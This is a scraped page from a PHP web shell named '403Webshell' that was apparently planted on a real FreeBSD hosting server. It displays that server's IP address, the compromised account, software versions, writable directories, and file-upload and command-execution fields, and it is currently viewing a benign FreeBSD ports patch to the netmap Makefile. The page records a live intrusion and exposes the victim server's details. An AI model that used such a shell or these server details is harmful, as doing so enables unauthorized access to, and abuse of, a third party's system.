403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/netmap/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/netmap/files/patch-netmap__Makefile
--- netmap/Makefile.orig	2010-01-06 07:59:38.000000000 +0900
+++ netmap/Makefile	2011-11-23 22:27:31.000000000 +0900
@@ -1,8 +1,7 @@
 CFILES   = misc.c hostclass.c netmap.c drawmap.c config.c args.c lookup.c
 OFILES   = $(CFILES:.c=.o)
 
-CFLAGS = -O -Wall -Wno-deprecated
-CC = g++
+CC = ${CXX}
 
 CPPFLAGS = -I../belgolib
 
@@ -28,13 +27,13 @@
 
 test: $(OFILES)
 	$(CC) -o $(OEXE) $(OFILES) $(LDFLAGS)
-	strip $(OEXE)
+#	strip $(OEXE)
 
 clean:
 	-/bin/rm -f $(OFILES) $(OEXE)
 
 depend: 
-	makedepend $(CPP_HEADERS)  -D__make_dep__ -- $(CFLAGS) -- $(CFILES)
+	makedepend $(CPP_HEADERS)  -D__make_dep__ -- $(CXXFLAGS) -- $(CFILES)
 
 
 # DO NOT DELETE

Youez - 2016 - github.com/yon3zu
LinuXploit